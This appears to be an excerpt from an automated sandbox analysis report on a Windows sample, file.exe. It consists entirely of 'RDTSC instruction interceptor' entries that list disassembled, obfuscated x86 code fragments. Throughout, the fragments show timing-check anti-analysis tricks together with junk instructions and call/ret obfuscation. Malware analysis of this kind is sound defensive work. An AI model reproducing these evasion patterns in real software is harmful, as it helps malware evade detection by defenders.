                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790A79 second address: 790A8A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F5ED4EAF476h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790A8A second address: 790A8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790B0B second address: 790B0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790C8A second address: 790C90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790DE2 second address: 790E32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F5ED4EAF488h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007F5ED4EAF478h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 00000014h 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a mov dword ptr [ebp+122D1819h], eax 0x00000030 push 99160980h 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 pushad 0x00000039 popad 0x0000003a pop eax 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790E32 second address: 790E76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jns 00007F5ED52EEF76h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e add dword ptr [esp], 66E9F700h 0x00000015 add edx, 28311910h 0x0000001b push 00000003h 0x0000001d mov edx, dword ptr [ebp+122D2BCBh] 0x00000023 push 00000000h 0x00000025 add dword ptr [ebp+122D28E5h], ecx 0x0000002b push 00000003h 0x0000002d jp 00007F5ED52EEF79h 0x00000033 call 00007F5ED52EEF79h 0x00000038 push edi 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790E76 second address: 790EA6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jmp 00007F5ED4EAF484h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F5ED4EAF47Eh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790EA6 second address: 790ED0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F5ED52EEF7Ch 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5ED52EEF84h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790ED0 second address: 790EE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5ED4EAF47Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790EE0 second address: 790F2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push edx 0x0000000c je 00007F5ED52EEF78h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov dl, al 0x00000018 lea ebx, dword ptr [ebp+12452976h] 0x0000001e jmp 00007F5ED52EEF89h 0x00000023 xchg eax, ebx 0x00000024 je 00007F5ED52EEF89h 0x0000002a pushad 0x0000002b jmp 00007F5ED52EEF7Bh 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790F2C second address: 790F4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5ED4EAF489h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790F4D second address: 790F53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B0C44 second address: 7B0C5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED4EAF480h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B0C5D second address: 7B0C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F5ED52EEF76h 0x0000000a pop edx 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 jnp 00007F5ED52EEF7Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1257 second address: 7B1278 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED4EAF488h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1278 second address: 7B127D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B13C5 second address: 7B13CA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1504 second address: 7B151C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5ED52EEF83h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B151C second address: 7B1524 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1524 second address: 7B1528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B168E second address: 7B1692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1800 second address: 7B1849 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED52EEF84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnc 00007F5ED52EEF76h 0x00000010 push edx 0x00000011 pop edx 0x00000012 jmp 00007F5ED52EEF84h 0x00000017 jmp 00007F5ED52EEF83h 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1992 second address: 7B1996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1996 second address: 7B19A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B19A2 second address: 7B19A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B19A6 second address: 7B19AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B19AA second address: 7B19B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B19B3 second address: 7B19B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B19B9 second address: 7B19DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 jno 00007F5ED4EAF476h 0x0000000c jmp 00007F5ED4EAF480h 0x00000011 pop edx 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B19DC second address: 7B19E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B19E2 second address: 7B19E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1B41 second address: 7B1B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1B47 second address: 7B1B50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pop ecx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1B50 second address: 7B1B75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED52EEF89h 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F5ED52EEF76h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1B75 second address: 7B1B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1D24 second address: 7B1D2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7744D0 second address: 7744F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5ED4EAF47Ch 0x0000000a pop esi 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5ED4EAF47Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7744F2 second address: 7744F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7744F6 second address: 7744FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1E8F second address: 7B1E9B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jne 00007F5ED52EEF76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1E9B second address: 7B1EBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED4EAF489h 0x00000007 jo 00007F5ED4EAF47Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1EBE second address: 7B1ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1ECD second address: 7B1ED1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B26F3 second address: 7B2700 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 js 00007F5ED52EEF7Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B2AD2 second address: 7B2B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5ED4EAF484h 0x00000009 jmp 00007F5ED4EAF47Eh 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 jns 00007F5ED4EAF476h 0x00000019 pop ecx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77E620 second address: 77E624 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B90E2 second address: 7B90E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7A45 second address: 7B7A4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7A4B second address: 7B7A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B93EE second address: 7B93F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F5ED52EEF76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BD1BC second address: 7BD1CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F5ED4EAF476h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BD1CA second address: 7BD1D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 785254 second address: 785258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 785258 second address: 78525C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78525C second address: 785269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 785269 second address: 78526F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78526F second address: 7852AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5ED4EAF487h 0x00000009 popad 0x0000000a jmp 00007F5ED4EAF47Ah 0x0000000f popad 0x00000010 jo 00007F5ED4EAF488h 0x00000016 jbe 00007F5ED4EAF482h 0x0000001c js 00007F5ED4EAF476h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BC6B8 second address: 7BC6F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED52EEF84h 0x00000007 jbe 00007F5ED52EEF7Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5ED52EEF83h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BC6F4 second address: 7BC6F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BC6F8 second address: 7BC703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BC863 second address: 7BC867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BC867 second address: 7BC86B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BCCD0 second address: 7BCCDA instructions: 0x00000000 rdtsc 0x00000002 je 00007F5ED4EAF476h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BCCDA second address: 7BCCE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop eax 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BCCE7 second address: 7BCCFD instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5ED4EAF488h 0x00000008 jmp 00007F5ED4EAF47Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BCE39 second address: 7BCE62 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 je 00007F5ED52EEF76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F5ED52EEF85h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BCE62 second address: 7BCE68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BCE68 second address: 7BCE6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BCE6D second address: 7BCE7D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5ED4EAF478h 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BCE7D second address: 7BCE81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BD038 second address: 7BD03C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BD03C second address: 7BD05C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007F5ED52EEF76h 0x0000000d push edi 0x0000000e pop edi 0x0000000f jnc 00007F5ED52EEF76h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push edi 0x0000001c pop edi 0x0000001d push eax 0x0000001e pop eax 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BD05C second address: 7BD064 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BEDCE second address: 7BEDD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF0E2 second address: 7BF0E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF156 second address: 7BF16D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5ED52EEF7Ch 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF16D second address: 7BF172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF8AB second address: 7BF8AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF927 second address: 7BF93E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5ED4EAF482h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF93E second address: 7BF948 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F5ED52EEF76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF948 second address: 7BF94C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF94C second address: 7BF988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F5ED52EEF78h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000014h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F5ED52EEF82h 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF988 second address: 7BF98D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BFA57 second address: 7BFA5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BFA5C second address: 7BFA62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BFEE5 second address: 7BFEE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BFEE9 second address: 7BFEED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BFEED second address: 7BFEF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BFEF3 second address: 7BFEFD instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5ED4EAF47Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C04B9 second address: 7C04D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED52EEF87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C1DB1 second address: 7C1E19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED4EAF486h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+122D30B6h], edi 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F5ED4EAF478h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c or esi, dword ptr [ebp+122D3021h] 0x00000032 push 00000000h 0x00000034 mov esi, dword ptr [ebp+122D1B2Bh] 0x0000003a xchg eax, ebx 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F5ED4EAF480h 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C1E19 second address: 7C1E3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F5ED52EEF76h 0x00000009 jno 00007F5ED52EEF76h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F5ED52EEF81h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C298A second address: 7C29BA instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5ED4EAF476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jmp 00007F5ED4EAF484h 0x00000010 push 00000000h 0x00000012 mov dword ptr [ebp+122D305Eh], ebx 0x00000018 push 00000000h 0x0000001a cmc 0x0000001b push eax 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
